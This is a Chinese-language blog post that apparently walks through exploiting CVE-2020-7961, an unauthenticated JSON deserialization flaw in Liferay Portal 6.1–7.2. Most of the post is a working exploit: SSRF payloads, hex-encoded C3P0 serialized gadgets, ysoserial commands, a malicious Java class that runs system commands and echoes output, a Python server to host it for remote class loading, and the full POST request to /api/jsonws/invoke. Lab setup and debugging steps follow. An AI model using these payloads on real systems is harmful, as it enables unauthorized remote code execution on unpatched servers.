Liferay Portal CVE-2020-7961

一、产品介绍

    Liferay(又称Liferay Portal)是一个开源门户项目,该项目包含了一个完整的J2EE应用。该项目使用了Web、EJB以及JMS等技术,特别是其前台界面部分使用Struts 框架技术,基于XML的portlet配置文件可以自由地动态扩展,使用了Web Services来支持一些远程信息的获取,使用 Apache Lucene实现全文检索功能。

 

二、漏洞介绍

    Liferay Portal 多个比较严重的 JSON fan 反序列化漏洞,影响 Liferay Portal 6.1、6.2、7.0、7.1 以及 7.2 版本,这些漏洞可以通过 Json web 进行未授权远程代码执行。

影响范围:

Liferay Portal 6.1.X

Liferay Portal 6.2.X

Liferay Portal 7.0.X

Liferay Portal 7.1.X

Liferay Portal 7.2.X

 

三、poc

1、SSRF1:

cmd={"/expandocolumn/add-column":{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&defaultData:javax.swing.JEditorPane={"page":"http://10.10.10.10","loginTimeout":0}

2、SSRF2:

cmd={"/expandocolumn/add-column":{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.JndiRefForwardingDataSource={"jndiName":"rmi://10.10.10.10/xxx","loginTimeout":0}

3、反序列化:

cmd={"/expandocolumn/add-column":{}}&p_auth=rA56NUR1&formDate=1587366607241&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED000573720028636F6D2E6D6368616E67652E76322E633370302E506F6F6C4261636B656444617461536F75726365DE22CD6CC7FF7FA802000078720035636F6D2E6D6368616E67652E76322E633370302E696D706C2E4162737472616374506F6F6C4261636B656444617461536F75726365000000000000000103000078720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000010300084900106E756D48656C706572546872656164734C0018636F6E6E656374696F6E506F6F6C44617461536F757263657400244C6A617661782F73716C2F436F6E6E656374696F6E506F6F6C44617461536F757263653B4C000E64617461536F757263654E616D657400124C6A6176612F6C616E672F537472696E673B4C000A657874656E73696F6E7374000F4C6A6176612F7574696C2F4D61703B4C0014666163746F7279436C6173734C6F636174696F6E71007E00044C000D6964656E74697479546F6B656E71007E00044C00037063737400224C6A6176612F6265616E732F50726F70657274794368616E6765537570706F72743B4C00037663737400224C6A6176612F6265616E732F5665746F61626C654368616E6765537570706F72743B7870770200017372003D636F6D2E6D6368616E67652E76322E6E616D696E672E5265666572656E6365496E6469726563746F72245265666572656E636553657269616C697A6564621985D0D12AC2130200044C000B636F6E746578744E616D657400134C6A617661782F6E616D696E672F4E616D653B4C0003656E767400154C6A6176612F7574696C2F486173687461626C653B4C00046E616D6571007E000A4C00097265666572656E63657400184C6A617661782F6E616D696E672F5265666572656E63653B7870707070737200166A617661782E6E616D696E672E5265666572656E6365E8C69EA2A8E98D090200044C000561646472737400124C6A6176612F7574696C2F566563746F723B4C000C636C617373466163746F727971007E00044C0014636C617373466163746F72794C6F636174696F6E71007E00044C0009636C6173734E616D6571007E00047870737200106A6176612E7574696C2E566563746F72D9977D5B803BAF010300034900116361706163697479496E6372656D656E7449000C656C656D656E74436F756E745B000B656C656D656E74446174617400135B4C6A6176612F6C616E672F4F626A6563743B78700000000000000000757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000A707070707070707070707874002D2F2F3531302E44455345522E38302E31313038332E7674702E73656375726974792E6875617765692E636F6D2F740004687474707400076578706C6F697470707070770400000000787702000178;"}

 

四、环境安装

下载集成了tomcat的liferay

https://cdn.lfrs.sl/releases.liferay.com/portal/7.1.2-ga3/liferay-ce-portal-tomcat-7.1.2-ga3-20190107144105508.7z

解压,修改tomcat启动端口,防止与其他端口冲突

Liferay Portal CVE-2020-7961_第1张图片

加上调试接口,便于后续idea调试

SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8788   

Liferay Portal CVE-2020-7961_第2张图片

双击启动startup.bat,如果tomcat报错,可能是调用了系统环境变量中的tomcat,删除系统环境变量中的tomcat即可。

 

五、构造poc

 

使用ysoserial生成poc二进制文件

java -jar ysoserial.jar C3P0 "http://127.0.0.1:8989/:Exploit" > 1.ser

再将二进制文件转换成hex字节码,转换源码如下:

import java.io.*;

public class yso2hex {

    public String encodeHex(InputStream fi) throws IOException {

        int size;

        String hexStr="";

        while ((size=fi.read())!=-1){

            String byteChar = Integer.toHexString(size);

            if(byteChar.length()<2) {

                byteChar = "0" + byteChar;

            }

            hexStr = hexStr + byteChar;

        }

        return hexStr;

    }

    public static void main(String[] args) throws IOException {

        FileInputStream fi  = new FileInputStream(new File("D:\\penetration\\poc\\1.ser"));

        yso2hex obj = new yso2hex();

        String pocStr = obj.encodeHex(fi);

        System.out.println(pocStr);

    }

}

转换结果如下,如果你发现你转换结果是F开头的,可能是执行ysoserial命令时使用了powershell,换成cmd。

aced000573720028636f6d2e6d6368616e67652e76322e633370302e506f6f6c4261636b656444617461536f75726365de22cd6cc7ff7fa802000078720035636f6d2e6d6368616e67652e76322e633370302e696d706c2e4162737472616374506f6f6c4261636b656444617461536f75726365000000000000000103000078720031636f6d2e6d6368616e67652e76322e633370302e696d706c2e506f6f6c4261636b656444617461536f757263654261736500000000000000010300084900106e756d48656c706572546872656164734c0018636f6e6e656374696f6e506f6f6c44617461536f757263657400244c6a617661782f73716c2f436f6e6e656374696f6e506f6f6c44617461536f757263653b4c000e64617461536f757263654e616d657400124c6a6176612f6c616e672f537472696e673b4c000a657874656e73696f6e7374000f4c6a6176612f7574696c2f4d61703b4c0014666163746f7279436c6173734c6f636174696f6e71007e00044c000d6964656e74697479546f6b656e71007e00044c00037063737400224c6a6176612f6265616e732f50726f70657274794368616e6765537570706f72743b4c00037663737400224c6a6176612f6265616e732f5665746f61626c654368616e6765537570706f72743b7870770200017372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e000a4c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f727971007e00044c0014636c617373466163746f72794c6f636174696f6e71007e00044c0009636c6173734e616d6571007e00047870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400074578706c6f6974740018687474703a2f2f31302e37302e362e3133303a393939392f7400076578706c6f697470707070770400000000787702000178

C3P0会在http://127.0.0.1:8989/下加载恶意类Exploit,其中恶意类如下所示:

public class Exploit {

    public Exploit(){

        try {

            Runtime.getRuntime().exec("calc");

        } catch (Exception e) {

        }

    }

}

如需要回显,可使用下面源码,通过获取context得到相关接口:

import com.liferay.portal.kernel.security.access.control.AccessControlUtil;

import com.liferay.portal.kernel.security.auth.AccessControlContext;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

import java.io.OutputStream;

 

public class Exploit {

    public Exploit(){

        try {

            Runtime.getRuntime().exec("calc");

            AccessControlContext accessControlContext = AccessControlUtil.getAccessControlContext();

            HttpServletResponse response =  accessControlContext.getResponse();

            OutputStream ot =  response.getOutputStream();

            ot.write("hei hei hei".getBytes());

            ot.flush();

            ot.close();

        } catch (Exception e) {

 

        }

    }

}

将上面源码保存于Exploit.java,然后使用下面命令进行编译

javac Exploit.java

然后使用python启动一个web服务,命令如下:

Python3 -m http.server 8989

注:windows下敲命令如果使用powershell,注意编码,建议使用cmd

 

六、构造恶意报文

恶意报文如下,将前面hex字节码填入其中。

POST /api/jsonws/invoke HTTP/1.1

Host: 127.0.0.1:9088

Content-Length: 2305

Content-Type: application/x-www-form-urlencoded

Connection: close

 

cmd={"/expandocolumn/add-column":{}}&p_auth=rA56NUR1&formDate=1587366607241&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED000573720028636F6D2E6D6368616E67652E76322E633370302E506F6F6C4261636B656444617461536F75726365DE22CD6CC7FF7FA802000078720035636F6D2E6D6368616E67652E76322E633370302E696D706C2E4162737472616374506F6F6C4261636B656444617461536F75726365000000000000000103000078720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000010300084900106E756D48656C706572546872656164734C0018636F6E6E656374696F6E506F6F6C44617461536F757263657400244C6A617661782F73716C2F436F6E6E656374696F6E506F6F6C44617461536F757263653B4C000E64617461536F757263654E616D657400124C6A6176612F6C616E672F537472696E673B4C000A657874656E73696F6E7374000F4C6A6176612F7574696C2F4D61703B4C0014666163746F7279436C6173734C6F636174696F6E71007E00044C000D6964656E74697479546F6B656E71007E00044C00037063737400224C6A6176612F6265616E732F50726F70657274794368616E6765537570706F72743B4C00037663737400224C6A6176612F6265616E732F5665746F61626C654368616E6765537570706F72743B7870770200017372003D636F6D2E6D6368616E67652E76322E6E616D696E672E5265666572656E6365496E6469726563746F72245265666572656E636553657269616C697A6564621985D0D12AC2130200044C000B636F6E746578744E616D657400134C6A617661782F6E616D696E672F4E616D653B4C0003656E767400154C6A6176612F7574696C2F486173687461626C653B4C00046E616D6571007E000A4C00097265666572656E63657400184C6A617661782F6E616D696E672F5265666572656E63653B7870707070737200166A617661782E6E616D696E672E5265666572656E6365E8C69EA2A8E98D090200044C000561646472737400124C6A6176612F7574696C2F566563746F723B4C000C636C617373466163746F727971007E00044C0014636C617373466163746F72794C6F636174696F6E71007E00044C0009636C6173734E616D6571007E00047870737200106A6176612E7574696C2E566563746F72D9977D5B803BAF010300034900116361706163697479496E6372656D656E7449000C656C656D656E74436F756E745B000B656C656D656E74446174617400135B4C6A6176612F6C616E672F4F626A6563743B78700000000000000000757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000A70707070707070707070787400074578706C6F6974740018687474703A2F2F31302E37302E362E3133303A393939392F7400076578706C6F697470707070770400000000787702000178;"}

打他:

Liferay Portal CVE-2020-7961_第3张图片

 

六、调试

将项目导入IDEA进行调试,将如下目录右键add as library

Liferay Portal CVE-2020-7961_第4张图片

增加remote configurations,并做如下配置:

Liferay Portal CVE-2020-7961_第5张图片

启动后即可愉快的调试了。

你可能感兴趣的:(安全)